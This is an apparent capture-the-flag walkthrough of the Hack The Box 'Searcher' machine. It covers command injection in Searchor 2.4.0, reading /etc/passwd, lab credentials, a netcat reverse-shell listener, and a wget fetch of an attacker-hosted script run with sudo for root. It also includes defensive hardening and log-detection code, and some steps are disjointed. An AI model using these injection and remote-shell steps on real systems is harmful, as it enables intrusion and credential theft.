Hack The Box (HTB) is an online platform and community that provides a range of penetration testing and hacking challenges. It is designed to help individuals improve their cybersecurity skills and knowledge in a safe and legal environment.
The IP of the machine instance was 10.10.11.208.
Started by running an nmap scan against the machine:
nmap -sC -sV 10.10.11.208
The open ports and services were 22/tcp and 80/tcp.
22/tcp — OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp — Apache/2.4.52 (Ubuntu)
Tried the IP in the browser and got an error.
I manually added the host to /etc/hosts:
10.10.11.208 searcher.htb (edited with nano, then saved).
Entering the URL in the browser again, we were able to reach the website ‘Searcher’.
At the bottom of the page the application stack is shown: ‘Flask and Searchor 2.4.0’.
Upon checking, there is a known vulnerability in this version of Searchor. When a component and version are exposed like this, check the project’s official site and forums for security advisories or updates, and look for CVE (Common Vulnerabilities and Exposures) entries for that version, since CVEs are the standard way known vulnerabilities are tracked.
For the most accurate information about vulnerabilities in any software, refer to official sources and follow security advisories, and keep software up to date with the latest patches to mitigate such issues.
I intercepted the web traffic with Burp and noticed the request parameters engine=Accuweather&query=. This is the input we can leverage if command injection is possible.
To give an idea of what command injection can do: command injection is a type of security vulnerability that occurs when an attacker is able to execute arbitrary commands on a computer or system through a vulnerable application. It is a common web application security flaw that occurs when untrusted data is passed to a command shell or operating system as part of a command or query, without proper validation or sanitization.
This vulnerability typically arises when an application allows user input (such as data from web forms or URLs) to be directly incorporated into a command or query that is executed by the underlying system. If the application does not properly validate or sanitize this input, an attacker can craft malicious input to manipulate the command and inject their own code.
Here’s an example of how command injection can occur in a web application that executes shell commands: Suppose there is a web application with a search feature that allows users to search for products by entering a product name. The application constructs a command to search for the product in a backend database, using user input directly:
import subprocess
from flask import request
# Vulnerable pattern: user input is concatenated straight into a shell command string
user_input = request.args.get("product_name")
command = "search_command " + user_input
result = subprocess.run(command, shell=True, capture_output=True, text=True)
An attacker could exploit this vulnerability by providing malicious input such as: product_name = "'; malicious_command #"
The resulting command executed on the system would be:
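As an added example (not code from the write-up), here is the search snippet above as working Python: the vulnerable string-building pattern beside a hardened version that validates the engine and never hands the query to a shell. The helper name `search_command` is taken from the snippet and assumed; `echo` stands in for it so the code runs offline.

```python
import re
import subprocess

SEARCH_COMMAND = "search_command"           # helper name from the snippet above (assumed)
ENGINE_ALLOWLIST = {"accuweather", "bing"}  # constructed allow-list; the real app's list is assumed


def vulnerable_command(engine: str, query: str) -> str:
    """The pattern from the snippet: user input concatenated into one shell string.
    Run through a shell (shell=True), everything after ';' becomes a second command."""
    return f"{SEARCH_COMMAND} --engine {engine} {query}"


def hardened_argv(engine: str, query: str) -> list:
    """Hardened version: validate the engine against an allow-list, reject control
    characters, and pass the query as a single argv element so no shell parses it."""
    if engine.lower() not in ENGINE_ALLOWLIST:
        raise ValueError(f"unsupported engine: {engine!r}")
    if len(query) > 200 or re.search(r"[\x00-\x1f]", query):
        raise ValueError("query rejected: too long or contains control characters")
    return [SEARCH_COMMAND, "--engine", engine.lower(), query]


def run_search(engine: str, query: str) -> str:
    """Execute with a list argv and shell=False. `echo` replaces search_command
    (constructed stand-in) so the example runs anywhere and shows that the query
    arrives verbatim as one argument instead of being interpreted."""
    argv = hardened_argv(engine, query)
    argv[0] = "echo"
    proc = subprocess.run(argv, capture_output=True, text=True, check=True)
    return proc.stdout.rstrip("\n")


if __name__ == "__main__":
    payload = "weather; id #"   # constructed injection attempt in the article's style
    print("vulnerable string :", vulnerable_command("Accuweather", payload))
    print("hardened argv     :", hardened_argv("Accuweather", payload))
    print("hardened output   :", run_search("Accuweather", payload))
```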
Got a response of 200 OK.
Added ‘)# to the query (disregard the trailing two letters SS). Still got the response I wanted.
Time to get creative: set the query value to “weather” (or any value that satisfies the parameter) followed by the command injection input.
Managed to get the OK response from the server :)
From the recon phase we already know the server runs Linux. Modified the query to call the Python os module with the command line ‘cat /etc/passwd’.
We finally got the result we wanted.
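From the defender’s side, the probing described above leaves traces in the web server’s access log. As an added example (not part of the write-up), this detection logic runs over constructed Apache combined-format lines for the Searcher app and flags query values that carry the indicators seen here: the quote/parenthesis breakout with a trailing ‘#’, Python os calls, and /etc/passwd. IPs, timestamps and requests in `SAMPLE_LOG` are made up.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-format lines for the Searcher app; IPs, times and
# requests are made up. Line 3 carries the ')# breakout from the write-up, line 4
# a Python os call aimed at /etc/passwd.
SAMPLE_LOG = """\
10.10.14.5 - - [01/Jan/2024:10:00:01 +0000] "GET /search?engine=Accuweather&query=weather HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.5 - - [01/Jan/2024:10:00:09 +0000] "POST /search HTTP/1.1" 200 640 "-" "Mozilla/5.0"
10.10.14.5 - - [01/Jan/2024:10:00:15 +0000] "GET /search?engine=Accuweather&query=weather%27%29%23 HTTP/1.1" 200 512 "-" "curl/7.88"
10.10.14.5 - - [01/Jan/2024:10:00:21 +0000] "GET /search?engine=Accuweather&query=os.system%28%27cat+%2Fetc%2Fpasswd%27%29 HTTP/1.1" 200 2048 "-" "curl/7.88"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Indicators, reported in this order. Each is one feature of the injection style
# the write-up describes, not a full payload.
INDICATORS = [
    ("quote_paren_breakout", re.compile(r"""['"]\s*\)""")),
    ("trailing_comment", re.compile(r"#\s*$")),
    ("python_os_call", re.compile(r"os\.system|os\.popen|subprocess\.|__import__")),
    ("sensitive_path", re.compile(r"/etc/(?:passwd|shadow)")),
]


def analyze_line(line: str):
    """Parse one access-log line and score its decoded `query` parameter.
    Returns None for lines that do not parse as combined-format entries."""
    m = LOG_RE.match(line)
    if not m:
        return None
    params = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
    query = params.get("query", [""])[0]        # parse_qs already URL-decodes
    hits = [name for name, rx in INDICATORS if rx.search(query)]
    return {"ip": m.group("ip"), "ts": m.group("ts"), "status": m.group("status"),
            "query": query, "hits": hits}


def suspicious_requests(log_text: str) -> list:
    """Return the parsed records whose query parameter matched at least one indicator."""
    records = (analyze_line(entry) for entry in log_text.splitlines())
    return [r for r in records if r and r["hits"]]


if __name__ == "__main__":
    for r in suspicious_requests(SAMPLE_LOG):
        print(r["ts"], r["ip"], r["status"], r["hits"], repr(r["query"]))
```

POST bodies never reach the access log, so the POST entry on line 2 scores nothing; catching injection in a form submitted by POST needs request logging inside the Flask app or a WAF in front of it.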
Directory listing
In the directory listing there is a .git folder, which contains useful information for getting to know the box better. By reading ‘.git/config’ we can learn how the repository is configured.
Credentials were found in .git/config; then list the directory and output its contents.
Username and password — cody: jh1usoih2bkjaspwe92
Double-checked /etc/hosts to see whether there is an additional host alongside the primary website.
There is a URL: gitea.searcher.htb
Netcat, often abbreviated as “nc,” is a versatile command-line networking utility used for reading from and writing to network connections. It is sometimes referred to as the “Swiss Army knife” of networking tools due to its wide range of functionalities. Originally developed for Unix-like operating systems, Netcat has been ported to various platforms, including Windows.
Netcat can be used for several purposes, including:
- Port Scanning: Netcat can scan a range of IP addresses and ports to check for open ports and services running on those ports.
- Creating and Handling Network Connections: Netcat can act as both a client and a server, allowing users to establish and manage network connections for various purposes.
- File Transfer: It can transfer files between machines using various protocols like TCP or UDP.
- Banner Grabbing: Netcat can retrieve banners from services running on specific ports, revealing information about the services and their versions.
- Port Forwarding: It can be used to forward traffic from one port on a local machine to another port on a remote machine.
- Shell and Command Execution: With the help of Netcat, users can execute shell commands on a remote machine and receive the output locally.
- Chat and Messaging: It can be used for simple chat or messaging between machines.
By using the command:
nc -nlvp 4444
we receive the connection from the reverse shell we created.
I added the URL to /etc/hosts on my machine, as before.
The site: gitea.searcher.htb
Go to Sign In: http://gitea.searcher.htb/user/login?redirect_to=%2f
The username and password were exfiltrated over the netcat connection we established.
Username and password — cody: jh1usoih2bkjaspwe92
In the terminal, ssh svc@IP using the credentials we found earlier.
List the current directory to find the user flag.
The sudo -l command lists the permissions or privileges that the current user has on the system when using sudo. sudo stands for "superuser do" and allows authorized users to execute commands with the privileges of the superuser (root) or another user, as specified in the configuration.
Running the commands on busqueda, we can find the ports, status, names and container IDs from Docker.
Docker is an open-source platform that enables developers to automate the deployment, scaling, and management of applications inside lightweight, portable containers. Containers are self-sufficient units that package all the necessary software, libraries, and configurations required to run an application. Docker allows developers to build, ship, and run applications consistently across different environments, such as development, testing, and production, without worrying about dependencies or underlying system differences.
We found a gitea and a mysql_db container.
The command systemctl --type=service --state=running is used to check the running services on the server.
The Docker daemon configuration overview.
URL: https://docs.docker.com/config/daemon/
Checking the logs, you can find an administrator username and password.
administrator:yuiu1hoiu4i5ho1uh
Administrator scripts:
- full-checkup.sh
- check-ports.py
- install-flask.sh
- system-checkup.py
The scripts can be found in /opt/scripts directory.
Created a script on my machine.
Opened a Python HTTP server in the desktop directory.
Using wget, a command-line utility for retrieving files from the internet through various protocols such as HTTP, HTTPS, FTP and FTPS. The name “wget” stands for “Web Get,” which reflects its primary purpose of downloading files from the web.
wget http://ipTun0:Port/FileName
Wait for the 200 status code. A 200 status code is part of the HTTP status code system and is one of the most common responses returned by web servers. It indicates a successful request, meaning that the server has successfully processed the client’s request and is returning the requested data.
Change the file mode to make it an executable binary. chmod is a command in Unix-like operating systems (e.g., Linux, macOS, and other Unix variants) used to change the permissions of files and directories. The name "chmod" stands for "change mode."
In Unix-based systems, every file and directory has three types of permissions, which define what actions can be performed on them by different users:
- Read (r): If a file has the read permission, it can be viewed and read by users. For directories, read permission allows listing the contents of the directory.
- Write (w): Write permission allows users to modify the contents of a file or create, delete, and rename files within a directory. For directories, write permission allows adding or removing files.
- Execute (x): Execute permission on a file allows it to be executed as a program or script. For directories, execute permission allows users to access the contents of the directory.
The permissions are specified separately for three different groups of users:
- Owner (u): The user who owns the file or directory.
- Group (g): The group associated with the file or directory.
- Others (o): All other users on the system who are not the owner or in the group.
Then run the command found with sudo -l.
Before running the binary, open nc for the incoming connection.
Got root.txt.